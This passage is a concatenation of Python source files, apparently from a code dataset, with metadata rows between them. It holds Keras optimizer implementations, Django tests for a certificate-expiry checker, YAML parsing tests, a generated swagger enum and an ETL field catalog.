    shapes = [K.int_shape(p) for p in params]
    # Accumulators grow monotonically (sum of squared gradients), which is
    # what shrinks the effective learning rate over time.
    accumulators = [K.zeros(shape) for shape in shapes]
    self.weights = accumulators
    self.updates = [state_ops.assign_add(self.iterations, 1)]
    lr = self.lr
    if self.initial_decay > 0:
      lr = lr * ( # pylint: disable=g-no-augmented-assignment
          1. / (1. + self.decay * math_ops.cast(self.iterations,
                                                K.dtype(self.decay))))
    for p, g, a in zip(params, grads, accumulators):
      new_a = a + math_ops.square(g) # update accumulator
      self.updates.append(state_ops.assign(a, new_a))
      new_p = p - lr * g / (K.sqrt(new_a) + self.epsilon)
      # Apply constraints.
      if getattr(p, 'constraint', None) is not None:
        new_p = p.constraint(new_p)
      self.updates.append(state_ops.assign(p, new_p))
    return self.updates
  def get_config(self):
    """Returns the optimizer configuration as a serializable dict."""
    config = {
        'lr': float(K.get_value(self.lr)),
        'decay': float(K.get_value(self.decay)),
        'epsilon': self.epsilon
    }
    base_config = super(Adagrad, self).get_config()
    return dict(list(base_config.items()) + list(config.items()))
class Adadelta(Optimizer):
  """Adadelta optimizer.
  Adadelta is a more robust extension of Adagrad
  that adapts learning rates based on a moving window of gradient updates,
  instead of accumulating all past gradients. This way, Adadelta continues
  learning even when many updates have been done. Compared to Adagrad, in the
  original version of Adadelta you don't have to set an initial learning
  rate. In this version, initial learning rate and decay factor can
  be set, as in most other Keras optimizers.
  It is recommended to leave the parameters of this optimizer
  at their default values.
  # Arguments
      lr: float >= 0. Initial learning rate, defaults to 1.
          It is recommended to leave it at the default value.
      rho: float >= 0. Adadelta decay factor, corresponding to fraction of
          gradient to keep at each time step.
      epsilon: float >= 0. Fuzz factor. If `None`, defaults to `K.epsilon()`.
      decay: float >= 0. Initial learning rate decay.
  # References
      - [Adadelta - an adaptive learning rate method](http://arxiv.org/abs/1212.5701)
  """
  def __init__(self, lr=1.0, rho=0.95, epsilon=None, decay=0., **kwargs):
    super(Adadelta, self).__init__(**kwargs)
    with K.name_scope(self.__class__.__name__):
      self.lr = K.variable(lr, name='lr')
      self.decay = K.variable(decay, name='decay')
      self.iterations = K.variable(0, dtype='int64', name='iterations')
    if epsilon is None:
      epsilon = K.epsilon()
    self.rho = rho
    self.epsilon = epsilon
    self.initial_decay = decay
  def get_updates(self, loss, params):
    """Builds and returns the list of ops that apply one Adadelta step."""
    grads = self.get_gradients(loss, params)
    shapes = [K.int_shape(p) for p in params]
    # Two moving averages per parameter: squared gradients and squared
    # parameter updates (the latter gives Adadelta its unit-correction).
    accumulators = [K.zeros(shape) for shape in shapes]
    delta_accumulators = [K.zeros(shape) for shape in shapes]
    self.weights = accumulators + delta_accumulators
    self.updates = [state_ops.assign_add(self.iterations, 1)]
    lr = self.lr
    if self.initial_decay > 0:
      lr = lr * ( # pylint: disable=g-no-augmented-assignment
          1. / (1. + self.decay * math_ops.cast(self.iterations,
                                                K.dtype(self.decay))))
    for p, g, a, d_a in zip(params, grads, accumulators, delta_accumulators):
      # update accumulator
      new_a = self.rho * a + (1. - self.rho) * math_ops.square(g)
      self.updates.append(state_ops.assign(a, new_a))
      # use the new accumulator and the *old* delta_accumulator
      update = g * K.sqrt(d_a + self.epsilon) / K.sqrt(new_a + self.epsilon)
      new_p = p - lr * update
      # Apply constraints.
      if getattr(p, 'constraint', None) is not None:
        new_p = p.constraint(new_p)
      self.updates.append(state_ops.assign(p, new_p))
      # update delta_accumulator
      new_d_a = self.rho * d_a + (1 - self.rho) * math_ops.square(update)
      self.updates.append(state_ops.assign(d_a, new_d_a))
    return self.updates
  def get_config(self):
    """Returns the optimizer configuration as a serializable dict."""
    config = {
        'lr': float(K.get_value(self.lr)),
        'rho': self.rho,
        'decay': float(K.get_value(self.decay)),
        'epsilon': self.epsilon
    }
    base_config = super(Adadelta, self).get_config()
    return dict(list(base_config.items()) + list(config.items()))
class Adam(Optimizer):
  """Adam optimizer.
  Default parameters follow those provided in the original paper.
  Arguments:
      lr: float >= 0. Learning rate.
      beta_1: float, 0 < beta < 1. Generally close to 1.
      beta_2: float, 0 < beta < 1. Generally close to 1.
      epsilon: float >= 0. Fuzz factor. If `None`, defaults to `K.epsilon()`.
      decay: float >= 0. Learning rate decay over each update.
      amsgrad: boolean. Whether to apply the AMSGrad variant of this
          algorithm from the paper "On the Convergence of Adam and
          Beyond".
  """
  def __init__(self,
               lr=0.001,
               beta_1=0.9,
               beta_2=0.999,
               epsilon=None,
               decay=0.,
               amsgrad=False,
               **kwargs):
    super(Adam, self).__init__(**kwargs)
    with K.name_scope(self.__class__.__name__):
      self.iterations = K.variable(0, dtype='int64', name='iterations')
      self.lr = K.variable(lr, name='lr')
      self.beta_1 = K.variable(beta_1, name='beta_1')
      self.beta_2 = K.variable(beta_2, name='beta_2')
      self.decay = K.variable(decay, name='decay')
    if epsilon is None:
      epsilon = K.epsilon()
    self.epsilon = epsilon
    self.initial_decay = decay
    self.amsgrad = amsgrad
  def get_updates(self, loss, params):
    """Builds and returns the list of ops that apply one Adam step."""
    grads = self.get_gradients(loss, params)
    self.updates = []
    lr = self.lr
    if self.initial_decay > 0:
      lr = lr * ( # pylint: disable=g-no-augmented-assignment
          1. / (1. + self.decay * math_ops.cast(self.iterations,
                                                K.dtype(self.decay))))
    # Increment the step counter before reading it so t starts at 1.
    with ops.control_dependencies([state_ops.assign_add(self.iterations, 1)]):
      t = math_ops.cast(self.iterations, K.floatx())
    # Bias-corrected step size (folds both moment corrections into lr_t).
    lr_t = lr * (
        K.sqrt(1. - math_ops.pow(self.beta_2, t)) /
        (1. - math_ops.pow(self.beta_1, t)))
    ms = [K.zeros(K.int_shape(p), dtype=K.dtype(p)) for p in params]
    vs = [K.zeros(K.int_shape(p), dtype=K.dtype(p)) for p in params]
    if self.amsgrad:
      vhats = [K.zeros(K.int_shape(p), dtype=K.dtype(p)) for p in params]
    else:
      # Placeholder slots so the weights list has a fixed layout either way.
      vhats = [K.zeros(1) for _ in params]
    self.weights = [self.iterations] + ms + vs + vhats
    for p, g, m, v, vhat in zip(params, grads, ms, vs, vhats):
      m_t = (self.beta_1 * m) + (1. - self.beta_1) * g
      v_t = (self.beta_2 * v) + (1. - self.beta_2) * math_ops.square(g)
      if self.amsgrad:
        vhat_t = math_ops.maximum(vhat, v_t)
        p_t = p - lr_t * m_t / (K.sqrt(vhat_t) + self.epsilon)
        self.updates.append(state_ops.assign(vhat, vhat_t))
      else:
        p_t = p - lr_t * m_t / (K.sqrt(v_t) + self.epsilon)
      self.updates.append(state_ops.assign(m, m_t))
      self.updates.append(state_ops.assign(v, v_t))
      new_p = p_t
      # Apply constraints.
      if getattr(p, 'constraint', None) is not None:
        new_p = p.constraint(new_p)
      self.updates.append(state_ops.assign(p, new_p))
    return self.updates
  def get_config(self):
    """Returns the optimizer configuration as a serializable dict."""
    config = {
        'lr': float(K.get_value(self.lr)),
        'beta_1': float(K.get_value(self.beta_1)),
        'beta_2': float(K.get_value(self.beta_2)),
        'decay': float(K.get_value(self.decay)),
        'epsilon': self.epsilon,
        'amsgrad': self.amsgrad
    }
    base_config = super(Adam, self).get_config()
    return dict(list(base_config.items()) + list(config.items()))
class Adamax(Optimizer):
  """Adamax optimizer from Adam paper's Section 7.
  It is a variant of Adam based on the infinity norm.
  Default parameters follow those provided in the paper.
  Arguments:
      lr: float >= 0. Learning rate.
      beta_1/beta_2: floats, 0 < beta < 1. Generally close to 1.
      epsilon: float >= 0. Fuzz factor. If `None`, defaults to `K.epsilon()`.
      decay: float >= 0. Learning rate decay over each update.
  """
  def __init__(self,
               lr=0.002,
               beta_1=0.9,
               beta_2=0.999,
               epsilon=None,
               decay=0.,
               **kwargs):
    super(Adamax, self).__init__(**kwargs)
    with K.name_scope(self.__class__.__name__):
      self.iterations = K.variable(0, dtype='int64', name='iterations')
      self.lr = K.variable(lr, name='lr')
      self.beta_1 = K.variable(beta_1, name='beta_1')
      self.beta_2 = K.variable(beta_2, name='beta_2')
      self.decay = K.variable(decay, name='decay')
    if epsilon is None:
      epsilon = K.epsilon()
    self.epsilon = epsilon
    self.initial_decay = decay
  def get_updates(self, loss, params):
    """Builds and returns the list of ops that apply one Adamax step."""
    grads = self.get_gradients(loss, params)
    self.updates = []
    lr = self.lr
    if self.initial_decay > 0:
      lr = lr * ( # pylint: disable=g-no-augmented-assignment
          1. / (1. + self.decay * math_ops.cast(self.iterations,
                                                K.dtype(self.decay))))
    # Increment the step counter before reading it so t starts at 1.
    with ops.control_dependencies([state_ops.assign_add(self.iterations, 1)]):
      t = math_ops.cast(self.iterations, K.floatx())
    # Only the first moment needs bias correction; the infinity norm does not.
    lr_t = lr / (1. - math_ops.pow(self.beta_1, t))
    shapes = [K.int_shape(p) for p in params]
    # zero init of 1st moment
    ms = [K.zeros(shape) for shape in shapes]
    # zero init of exponentially weighted infinity norm
    us = [K.zeros(shape) for shape in shapes]
    self.weights = [self.iterations] + ms + us
    for p, g, m, u in zip(params, grads, ms, us):
      m_t = (self.beta_1 * m) + (1. - self.beta_1) * g
      u_t = math_ops.maximum(self.beta_2 * u, math_ops.abs(g))
      p_t = p - lr_t * m_t / (u_t + self.epsilon)
      self.updates.append(state_ops.assign(m, m_t))
      self.updates.append(state_ops.assign(u, u_t))
      new_p = p_t
      # Apply constraints.
      if getattr(p, 'constraint', None) is not None:
        new_p = p.constraint(new_p)
      self.updates.append(state_ops.assign(p, new_p))
    return self.updates
  def get_config(self):
    """Returns the optimizer configuration as a serializable dict."""
    config = {
        'lr': float(K.get_value(self.lr)),
        'beta_1': float(K.get_value(self.beta_1)),
        'beta_2': float(K.get_value(self.beta_2)),
        'decay': float(K.get_value(self.decay)),
        'epsilon': self.epsilon
    }
    base_config = super(Adamax, self).get_config()
    return dict(list(base_config.items()) + list(config.items()))
class Nadam(Optimizer):
  """Nesterov Adam optimizer.
  Much like Adam is essentially RMSprop with momentum,
  Nadam is Adam RMSprop with Nesterov momentum.
  Default parameters follow those provided in the paper.
  It is recommended to leave the parameters of this optimizer
  at their default values.
  Arguments:
      lr: float >= 0. Learning rate.
      beta_1/beta_2: floats, 0 < beta < 1. Generally close to 1.
      epsilon: float >= 0. Fuzz factor. If `None`, defaults to `K.epsilon()`.
  """
  def __init__(self,
               lr=0.002,
               beta_1=0.9,
               beta_2=0.999,
               epsilon=None,
               schedule_decay=0.004,
               **kwargs):
    super(Nadam, self).__init__(**kwargs)
    with K.name_scope(self.__class__.__name__):
      self.iterations = K.variable(0, dtype='int64', name='iterations')
      # Running product of the momentum schedule (mu_1 * mu_2 * ... * mu_t).
      self.m_schedule = K.variable(1., name='m_schedule')
      self.lr = K.variable(lr, name='lr')
      self.beta_1 = K.variable(beta_1, name='beta_1')
      self.beta_2 = K.variable(beta_2, name='beta_2')
    if epsilon is None:
      epsilon = K.epsilon()
    self.epsilon = epsilon
    self.schedule_decay = schedule_decay
  def get_updates(self, loss, params):
    """Builds and returns the list of ops that apply one Nadam step."""
    grads = self.get_gradients(loss, params)
    self.updates = []
    # Increment the step counter before reading it so t starts at 1.
    with ops.control_dependencies([state_ops.assign_add(self.iterations, 1)]):
      t = math_ops.cast(self.iterations, K.floatx())
    # Due to the recommendations in [2], i.e. warming momentum schedule
    momentum_cache_t = self.beta_1 * (
        1. - 0.5 *
        (math_ops.pow(K.cast_to_floatx(0.96), t * self.schedule_decay)))
    momentum_cache_t_1 = self.beta_1 * (
        1. - 0.5 *
        (math_ops.pow(K.cast_to_floatx(0.96), (t + 1) * self.schedule_decay)))
    m_schedule_new = self.m_schedule * momentum_cache_t
    m_schedule_next = self.m_schedule * momentum_cache_t * momentum_cache_t_1
    self.updates.append((self.m_schedule, m_schedule_new))
    shapes = [K.int_shape(p) for p in params]
    ms = [K.zeros(shape) for shape in shapes]
    vs = [K.zeros(shape) for shape in shapes]
    self.weights = [self.iterations, self.m_schedule] + ms + vs
    for p, g, m, v in zip(params, grads, ms, vs):
      # the following equations given in [1]
      g_prime = g / (1. - m_schedule_new)
      m_t = self.beta_1 * m + (1. - self.beta_1) * g
      m_t_prime = m_t / (1. - m_schedule_next)
      v_t = self.beta_2 * v + (1. - self.beta_2) * math_ops.square(g)
      v_t_prime = v_t / (1. - math_ops.pow(self.beta_2, t))
      m_t_bar = (
          1. - momentum_cache_t) * g_prime + momentum_cache_t_1 * m_t_prime
      self.updates.append(state_ops.assign(m, m_t))
      self.updates.append(state_ops.assign(v, v_t))
      p_t = p - self.lr * m_t_bar / (K.sqrt(v_t_prime) + self.epsilon)
      new_p = p_t
      # Apply constraints.
      if getattr(p, 'constraint', None) is not None:
        new_p = p.constraint(new_p)
      self.updates.append(state_ops.assign(p, new_p))
    return self.updates
  def get_config(self):
    """Returns the optimizer configuration as a serializable dict."""
    config = {
        'lr': float(K.get_value(self.lr)),
        'beta_1': float(K.get_value(self.beta_1)),
        'beta_2': float(K.get_value(self.beta_2)),
        'epsilon': self.epsilon,
        'schedule_decay': self.schedule_decay
    }
    base_config = super(Nadam, self).get_config()
    return dict(list(base_config.items()) + list(config.items()))
class TFOptimizer(Optimizer, checkpointable.Checkpointable):
  """Wrapper class for native TensorFlow optimizers.
  """
  def __init__(self, optimizer, iterations=None): # pylint: disable=super-init-not-called
    self.optimizer = optimizer
    self._track_checkpointable(optimizer, name='optimizer')
    if iterations is None:
      with K.name_scope(self.__class__.__name__):
        self.iterations = K.variable(0, dtype='int64', name='iterations')
    else:
      self.iterations = iterations
    self._track_checkpointable(self.iterations, name='global_step')
  def apply_gradients(self, grads):
    # Delegates directly to the wrapped native optimizer.
    self.optimizer.apply_gradients(grads, global_step=self.iterations)
  def get_grads(self, loss, params):
    return self.optimizer.compute_gradients(loss, params)
  def get_updates(self, loss, params):
    """Builds the update op via the wrapped optimizer's compute/apply pair."""
    if distribution_strategy_context.has_strategy():
      self.updates = []
      if not params:
        # After the model vars have been created, the second call to get_updates
        # is called with params as an empty list. This ensures that we call
        # compute_gradients with params=None.
        grads = self.optimizer.compute_gradients(loss)
      else:
        grads = self.optimizer.compute_gradients(loss, params)
      global_step = training_util.get_global_step()
      opt_update = self.optimizer.apply_gradients(grads, global_step)
    else:
      if not params:
        self.updates = [state_ops.assign_add(self.iterations, 1)]
        return self.updates
      # Updates list starts out empty because the iterations variable is
      # incremented in optimizer.apply_gradients()
      self.updates = []
      grads = self.optimizer.compute_gradients(loss, params)
      opt_update = self.optimizer.apply_gradients(
          grads, global_step=self.iterations)
    self.updates.append(opt_update)
    return self.updates
  @property
  def weights(self):
    # Native TF optimizers do not expose Keras-style weight lists.
    raise NotImplementedError
  def get_config(self):
    raise NotImplementedError
  def from_config(self, config):
    raise NotImplementedError
# Aliases.
# Lowercase names mirror the class names so that string identifiers such as
# 'sgd' (see `deserialize`, which lowercases built-in class names) resolve.
sgd = SGD
rmsprop = RMSprop
adagrad = Adagrad
adadelta = Adadelta
adam = Adam
adamax = Adamax
nadam = Nadam
@keras_export('keras.optimizers.serialize')
def serialize(optimizer):
  """Returns `optimizer` serialized as a Keras config dictionary."""
  return serialize_keras_object(optimizer)
@keras_export('keras.optimizers.deserialize')
def deserialize(config, custom_objects=None):
  """Inverse of the `serialize` function.
  Arguments:
      config: Optimizer configuration dictionary.
      custom_objects: Optional dictionary mapping
          names (strings) to custom objects
          (classes and functions)
          to be considered during deserialization.
  Returns:
      A Keras Optimizer instance.
  """
  # Built-in names deliberately map to the V2 optimizer implementations.
  all_classes = {
      'adadelta': adadelta_v2.Adadelta,
      'adagrad': adagrad_v2.Adagrad,
      'adam': adam_v2.Adam,
      'adamax': adamax_v2.Adamax,
      'nadam': nadam_v2.Nadam,
      'rmsprop': rmsprop_v2.RMSprop,
      'sgd': gradient_descent_v2.SGD
  }
  # Make deserialization case-insensitive for built-in optimizers.
  if config['class_name'].lower() in all_classes:
    config['class_name'] = config['class_name'].lower()
  return deserialize_keras_object(
      config,
      module_objects=all_classes,
      custom_objects=custom_objects,
      printable_module_name='optimizer')
@keras_export('keras.optimizers.get')
def get(identifier):
  """Retrieves a Keras Optimizer instance.
  Arguments:
      identifier: Optimizer identifier, one of
          - String: name of an optimizer
          - Dictionary: configuration dictionary.
          - Keras Optimizer instance (it will be returned unchanged).
          - TensorFlow Optimizer instance
              (it will be wrapped as a Keras Optimizer).
  Returns:
      A Keras Optimizer instance.
  Raises:
      ValueError: If `identifier` cannot be interpreted.
  """
  if isinstance(identifier, (Optimizer, optimizer_v2.OptimizerV2)):
    return identifier
  # Wrap TF optimizer instances
  elif isinstance(identifier, tf_optimizer_module.Optimizer):
    opt = TFOptimizer(identifier)
    K.track_tf_optimizer(opt)
    return opt
  elif isinstance(identifier, dict):
    return deserialize(identifier)
  elif isinstance(identifier, six.string_types):
    # A bare name is treated as a config with default arguments.
    config = {'class_name': str(identifier), 'config': {}}
    return deserialize(config)
  else:
    raise ValueError('Could not interpret optimizer identifier:', identifier)
| 35.387588 | 145 | 0.651865 |
c062f97c95e76a51c19732326cb41d645d78afe8 | 2,189 | py | Python | tests/test_data.py | sarvjeets/lakshmi | 8cd6e47f23a61c5b8c967f9fdc756df296f1e0d5 | [
"MIT"
] | 59 | 2021-09-07T05:19:30.000Z | 2022-02-24T18:29:49.000Z | tests/test_data.py | sarvjeets/lakshmi | 8cd6e47f23a61c5b8c967f9fdc756df296f1e0d5 | [
"MIT"
] | 4 | 2021-08-01T18:32:51.000Z | 2022-02-26T19:14:37.000Z | tests/test_data.py | sarvjeets/lakshmi | 8cd6e47f23a61c5b8c967f9fdc756df296f1e0d5 | [
"MIT"
] | 3 | 2021-08-01T04:35:07.000Z | 2022-03-23T21:48:51.000Z | """Tests for lakshmi/data directory. Simply checks if the files parses."""
import unittest
from pathlib import Path
import yaml
import lakshmi
class DataTest(unittest.TestCase):
    """Smoke-tests the example YAML files shipped with lakshmi.

    Each test loads an example data file (relative to the repo root),
    parses it with the matching ``from_dict`` constructor and asserts the
    result is not None -- i.e. the examples stay in sync with the code.
    """

    def parse_dict(self, filename, function):
        """Load `filename` as YAML and return `function(parsed_dict)`."""
        file_path = Path(__file__).parents[1].absolute() / filename
        # safe_load is the idiomatic shorthand for
        # yaml.load(..., Loader=yaml.SafeLoader).
        d = yaml.safe_load(file_path.read_text())
        return function(d)

    def test_account(self):
        self.assertIsNotNone(self.parse_dict('lakshmi/data/Account.yaml',
                                             lakshmi.Account.from_dict))

    def test_asset_class(self):
        self.assertIsNotNone(self.parse_dict('lakshmi/data/AssetClass.yaml',
                                             lakshmi.AssetClass.from_dict))

    def test_ee_bonds(self):
        self.assertIsNotNone(self.parse_dict('lakshmi/data/EEBonds.yaml',
                                             lakshmi.assets.EEBonds.from_dict))

    def test_i_bonds(self):
        self.assertIsNotNone(self.parse_dict('lakshmi/data/IBonds.yaml',
                                             lakshmi.assets.IBonds.from_dict))

    def test_manual_asset(self):
        self.assertIsNotNone(
            self.parse_dict(
                'lakshmi/data/ManualAsset.yaml',
                lakshmi.assets.ManualAsset.from_dict))

    def test_ticker_asset(self):
        self.assertIsNotNone(
            self.parse_dict(
                'lakshmi/data/TickerAsset.yaml',
                lakshmi.assets.TickerAsset.from_dict))

    def test_vanguard_fund(self):
        self.assertIsNotNone(
            self.parse_dict(
                'lakshmi/data/VanguardFund.yaml',
                lakshmi.assets.VanguardFund.from_dict))

    def test_checkpoint(self):
        # Checkpoint.from_dict also needs a date, supplied via the lambda.
        self.assertIsNotNone(
            self.parse_dict(
                'lakshmi/data/Checkpoint.yaml',
                lambda x: lakshmi.performance.Checkpoint.from_dict(
                    x, date='2021/01/01')))

    def test_portfolio(self):
        self.assertIsNotNone(self.parse_dict('docs/portfolio.yaml',
                                             lakshmi.Portfolio.from_dict))
# Allow running this test module directly, outside a test runner.
if __name__ == '__main__':
    unittest.main()
| 34.203125 | 79 | 0.596619 |
b1195e0c9f4d85a50906b06f6c77195939bbdf9e | 5,556 | py | Python | check/tests.py | uktrade/cert-checker | 7b8fc2c26fd162a10e847d05bc253c30659147c0 | [
"MIT"
] | null | null | null | check/tests.py | uktrade/cert-checker | 7b8fc2c26fd162a10e847d05bc253c30659147c0 | [
"MIT"
] | 1 | 2018-08-28T12:13:10.000Z | 2018-08-28T12:13:10.000Z | check/tests.py | uktrade/cert-checker | 7b8fc2c26fd162a10e847d05bc253c30659147c0 | [
"MIT"
] | null | null | null | import datetime as dt
from django.test import TestCase, RequestFactory
from .models import Domain
from .views import PingdomErrorView, PingdomWarningView, PingdomHealthCheckView
def current_time():
    """Return the current moment as a timezone-aware UTC datetime."""
    return dt.datetime.now(tz=dt.timezone.utc)
def domain_factory(**overrides):
    """Create and save a Domain with sensible defaults.

    Any field may be overridden via keyword arguments; by default the
    domain was last checked two days ago and has OK status.
    """
    fields = dict(
        last_checked=current_time() - dt.timedelta(days=2),
        name='testing.com',
        port='443',
        status=Domain.OK,
        status_text='',
    )
    fields.update(overrides)
    return Domain.objects.create(**fields)
class PingdomHealthCheckViewTestCase(TestCase):
    """Tests for the /pingdom/healthcheck/ endpoint (cron freshness)."""
    def setUp(self):
        # RequestFactory builds requests without going through URL routing.
        self.factory = RequestFactory()
    def test_cron_job_has_not_run_recently_error(self):
        # No Domain rows exist, so no recent check is recorded -> DOWN.
        request = self.factory.get('/pingdom/healthcheck/')
        response = PingdomHealthCheckView.as_view()(request)
        self.assertContains(response, 'DOWN')
    def test_cron_job_has_run_recently_ok(self):
        # A domain checked 20 minutes ago counts as a recent check -> OK.
        domain_factory(last_checked=current_time()-dt.timedelta(minutes=20))
        request = self.factory.get('/pingdom/healthcheck/')
        response = PingdomHealthCheckView.as_view()(request)
        self.assertContains(response, 'OK')
class PingdomWarningViewTestCase(TestCase):
    """Tests for the /pingdom/warnings/ endpoint."""
    def test_has_warnings(self):
        # A domain in WARNING state makes the endpoint report DOWN.
        domain_factory(status=Domain.WARNING)
        request = RequestFactory().get('/pingdom/warnings/')
        response = PingdomWarningView.as_view()(request)
        self.assertContains(response, 'DOWN')
        self.assertEqual(response.status_code, 200)
    def test_has_warnings_false(self):
        # With no warning domains the endpoint reports OK.
        # NOTE(review): unlike the other tests here, the status code is not
        # asserted -- consider adding assertEqual(response.status_code, 200).
        request = RequestFactory().get('/pingdom/warnings/')
        response = PingdomWarningView.as_view()(request)
        self.assertContains(response, 'OK')
class PingdomErrorViewTestCase(TestCase):
    """Tests for the /pingdom/errors/ endpoint."""
    def test_has_errors(self):
        # A domain in ERROR state makes the endpoint report DOWN.
        domain_factory(status=Domain.ERROR)
        request = RequestFactory().get('/pingdom/errors/')
        response = PingdomErrorView.as_view()(request)
        self.assertContains(response, 'DOWN')
        self.assertEqual(response.status_code, 200)
    def test_has_errors_false(self):
        # With no error domains the endpoint reports OK.
        request = RequestFactory().get('/pingdom/errors/')
        response = PingdomErrorView.as_view()(request)
        self.assertContains(response, 'OK')
        self.assertEqual(response.status_code, 200)
class DomainModelTestCase(TestCase):
    """Tests for the Domain model's custom manager and status-update logic."""
    def test_has_errors_true(self):
        """An ERROR domain sets has_errors() without setting has_warnings()."""
        domain_factory(status=Domain.ERROR)
        self.assertTrue(Domain.objects.has_errors())
        self.assertFalse(Domain.objects.has_warnings())
    def test_has_warnings_true(self):
        """A WARNING domain sets has_warnings() without setting has_errors()."""
        domain_factory(status=Domain.WARNING)
        self.assertFalse(Domain.objects.has_errors())
        self.assertTrue(Domain.objects.has_warnings())
    def test_has_check_run_recently_true(self):
        """A domain checked 20 minutes ago counts as a recent check."""
        domain_factory(last_checked=current_time()-dt.timedelta(minutes=20))
        self.assertTrue(Domain.objects.has_check_run_recently())
    def test_has_check_run_recently_false(self):
        """With no domains stored, no check counts as recent."""
        self.assertFalse(Domain.objects.has_check_run_recently())
    def test_get_domain_check_list(self):
        """Only stale, oldest-per-status, or never-checked domains are due."""
        domain_factory(
            name='domain1', last_checked=current_time()-dt.timedelta(minutes=240), status=Domain.ERROR)
        domain_factory(
            name='domain2', last_checked=current_time()-dt.timedelta(minutes=30), status=Domain.ERROR)
        domain_factory(
            name='domain3', last_checked=current_time()-dt.timedelta(hours=25), status=Domain.OK)
        domain_factory(
            name='domain4', last_checked=current_time()-dt.timedelta(hours=20), status=Domain.OK)
        domain_factory(
            name='domain5', last_checked=current_time()-dt.timedelta(minutes=200), status=Domain.WARNING)
        domain_factory(
            name='domain6', last_checked=current_time()-dt.timedelta(minutes=30), status=Domain.WARNING)
        domain_factory(
            name='domain7', last_checked=None, status=Domain.NOTCHECKED
        )
        domains = set(Domain.objects.get_domain_check_list().values_list('name', flat=True))
        self.assertEqual({'domain1', 'domain3', 'domain5', 'domain7'}, domains)
    def test_update_supresses_status(self):
        """Suppressed warning texts do not downgrade the domain from OK."""
        domain = domain_factory()
        status_text = [
            ('warning', 'More alternate names than specified ...'),
        ]
        domain = Domain.objects.update_domain_status(
            [domain.domain_name()], current_time()+dt.timedelta(days=30), status_text)
        self.assertEqual(domain.status, Domain.OK)
    def test_update_records_last_checked_timestamp(self):
        """Updating status refreshes the last_checked timestamp."""
        domain = domain_factory()
        last_checked = domain.last_checked
        domain = Domain.objects.update_domain_status(
            [domain.domain_name()], current_time()-dt.timedelta(days=30), [])
        self.assertNotEqual(last_checked, domain.last_checked)
    def test_expired_cert_recorded_as_error(self):
        """A certificate that expired yesterday marks the domain as ERROR."""
        domain = domain_factory()
        domain = Domain.objects.update_domain_status(
            [domain.domain_name()], current_time() - dt.timedelta(days=1), [])
        self.assertEqual(domain.status, Domain.ERROR)
        # Fixed: arguments were reversed (assertIn takes member, container);
        # the original checked status_text in the literal, which passed
        # vacuously for any substring of the message, including ''.
        self.assertIn('error: certificate has expired', domain.status_text)
    def test_nearly_expiring_cert_recorded_as_warning(self):
        """A certificate expiring in 5 days marks the domain as WARNING."""
        domain = domain_factory()
        domain = Domain.objects.update_domain_status(
            [domain.domain_name()], current_time()+dt.timedelta(days=5), [])
        self.assertEqual(domain.status, Domain.WARNING)
        self.assertEqual(domain.status_text, 'warning: certificate is due to expire soon')
| 33.46988 | 105 | 0.689525 |
ba986819c04d1f2156504824ff4fb709cd23f41b | 743 | py | Python | client/verta/verta/_swagger/_public/uac/model/RoleActionEnumRoleServiceActions.py | stefan-petrov-toptal/modeldb | a8a9b9da6ed964c91351230b2f0d2703c75794de | [
"Apache-2.0"
] | 835 | 2017-02-08T20:14:24.000Z | 2020-03-12T17:37:49.000Z | client/verta/verta/_swagger/_public/uac/model/RoleActionEnumRoleServiceActions.py | stefan-petrov-toptal/modeldb | a8a9b9da6ed964c91351230b2f0d2703c75794de | [
"Apache-2.0"
] | 651 | 2019-04-18T12:55:07.000Z | 2022-03-31T23:45:09.000Z | client/verta/verta/_swagger/_public/uac/model/RoleActionEnumRoleServiceActions.py | stefan-petrov-toptal/modeldb | a8a9b9da6ed964c91351230b2f0d2703c75794de | [
"Apache-2.0"
] | 170 | 2017-02-13T14:49:22.000Z | 2020-02-19T17:59:12.000Z | # THIS FILE IS AUTO-GENERATED. DO NOT EDIT
from verta._swagger.base_type import BaseType
class RoleActionEnumRoleServiceActions(BaseType):
  """Auto-generated swagger enum wrapper for RoleService action names."""
  # Closed set of values the constructor accepts.
  _valid_values = [
    "UNKNOWN",
    "ALL",
    "GET_BY_ID",
    "GET_BY_NAME",
    "CREATE",
    "UPDATE",
    "LIST",
    "DELETE",
  ]
  def __init__(self, val):
    # Reject anything outside the enum's value set.
    if val not in RoleActionEnumRoleServiceActions._valid_values:
      raise ValueError('{} is not a valid value for RoleActionEnumRoleServiceActions'.format(val))
    self.value = val
  def to_json(self):
    # Serialized form is simply the enum's string value.
    return self.value
  def from_json(v):
    # NOTE(review): defined without `self` or @staticmethod, so this only
    # works when called through the class as a plain function (Python 3) --
    # presumably generator output; the file header says DO NOT EDIT.
    if isinstance(v, str):
      return RoleActionEnumRoleServiceActions(v)
    else:
      # A non-string value is treated as an index into _valid_values.
      return RoleActionEnumRoleServiceActions(RoleActionEnumRoleServiceActions._valid_values[v])
| 24.766667 | 98 | 0.709287 |
65fc4c6b08375688e7aa70ff86203458179f848c | 1,322 | py | Python | newsltd_etl/shared/schema/catalog/chronicle.py | telia-oss/birgitta-example-etl | 8bb32aac94486b4edc1fee3964cf7d2dcf095020 | [
"MIT"
] | 8 | 2019-11-25T16:39:33.000Z | 2022-03-31T12:48:54.000Z | newsltd_etl/shared/schema/catalog/chronicle.py | telia-oss/birgitta-example-etl | 8bb32aac94486b4edc1fee3964cf7d2dcf095020 | [
"MIT"
] | 218 | 2019-09-09T11:11:59.000Z | 2022-03-08T05:16:40.000Z | newsltd_etl/shared/schema/catalog/chronicle.py | telia-oss/birgitta-example-etl | 8bb32aac94486b4edc1fee3964cf7d2dcf095020 | [
"MIT"
] | 4 | 2020-07-21T15:33:40.000Z | 2021-12-22T11:32:45.000Z | from birgitta.fields.catalog import Catalog
from ...schema.fixtures.values import chronicle as cv
catalog = Catalog()
catalog.add_field(
'groupid',
example=cv.groupid(),
description='Chronicle group id'
)
catalog.add_field(
'accountid',
example=cv.accountid(),
description='Chronicle account id'
)
catalog.add_field(
'chronicle_account_id',
example=cv.accountid(),
description='Chronicle account id'
)
catalog.add_field(
'cellphone',
example=cv.cellphone(),
description='Chronicle phone number'
)
catalog.add_field(
'enddate_yyyymmdd',
example=cv.enddate_yyyymmdd(),
description='Chronicle contract end date.'
)
catalog.add_field(
'startdate_yyyymmdd',
example=cv.startdate_yyyymmdd(),
description='Chronicle contract start date.'
)
catalog.add_field(
'priceplan_code',
example=cv.priceplan_code(),
description='Chronicle code of the priceplan'
)
catalog.add_field(
'priceplan_price',
example=cv.priceplan_price(),
description='Chronicle price of the priceplan'
)
catalog.add_field(
'status',
example=0,
description='Chronicle client status. 1 is active. 2 is inactive. 4 is discontinued.' # noqa E501
)
catalog.add_field(
'customerid',
